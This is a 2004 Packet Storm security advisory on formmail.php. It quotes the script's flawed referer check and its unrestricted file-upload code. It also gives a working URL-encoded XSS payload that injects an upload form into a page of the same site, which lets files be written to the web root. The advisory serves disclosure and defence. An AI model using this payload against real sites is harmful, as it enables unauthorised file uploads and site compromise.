exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

formmailphp.txt

formmailphp.txt
Posted Feb 6, 2004
Authored by Nourredine Himeur | Site security-challenge.com

A cross site scripting flaw exists in formmail.php.

tags | advisory, php, xss
SHA-256 | d49f56633d701471196ff37392bfceff436e67bd19935a0a27674c25c4999346

formmailphp.txt

Change Mirror Download


Informations :

°°°°°°°°°°°°°°

Website : http://www.dtheatre.com/scripts/

Version : all

Problem : Upload file







PHP Code/Location :

°°°°°°°°°°°°°°°°°°°

formmail.php :

------------------------------------------------------------------

function check_referer($referers) {

if (count($referers)) {

$found = false;



$temp = explode("/",getenv("HTTP_REFERER"));

$referer = $temp[2];



if ($referer=="") {$referer = $_SERVER['HTTP_REFERER'];

list($remove,$stuff)=split('//',$referer,2);

list($home,$stuff)=split('/',$stuff,2);

$referer = $home;

}



for ($x=0; $x < count($referers); $x++) {

if (eregi ($referers[$x], $referer)) {

$found = true;

}

}

if ($referer =="")

$found = false;

if (!$found){

print_error("You are coming from an <b>unauthorized domain.</b>");

error_log("[FormMail.php] Illegal Referer. (".getenv("HTTP_REFERER").")", 0);

}

return $found;

} else {

return true; // not a good idea, if empty, it will allow it.

}

}

------------------------------------------------------------------

...

------------------------------------------------------------------

// check for a file if there is a file upload it

if ($file_name) {

if ($file_size > 0) {

if (!ereg("/$", $path_to_file))

$path_to_file = $path_to_file."/";

$location = $path_to_file.$file_name;

if (file_exists($path_to_file.$file_name))

$location = $path_to_file.rand(1000,3000).".".$file_name;

copy($file,$location);

unlink($file);

$content .= "Uploaded File: ".$location."\n";

}

}

------------------------------------------------------------------



You can bypassing the REFERER protection and put a file on the site (for exemple with a Cross Site Scripting on the same site).This option running even if this function is desactivated.



Exploit :

°°°°°°°°°



http://www.exemple.com/foo.php?css=<form%20method=post%20enctype=multipart/form-data%20action=formmail.php><input%20type=hidden%20name=MAX_FILE_SIZE%20value=1000000><input%20type=hidden%20name=path_to_file%20value=./><input%20type=text%20name=email><input%20type=file%20name=file%20><input%20type=hidden%20name=recipient%20%20value=%20foo@foo.com%20><input%20type=submit>





Whith :

http://www.exemple.com/formmail.php

and

http://www.exemple.com/file.php?css= <-- Cross Site Scripting Here







For More details :

°°°°°°°°°°°°°°

IRC : hauzgur.serveirc.com / #defaced





Nourredine Himeur



www.security-challenge.com





Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close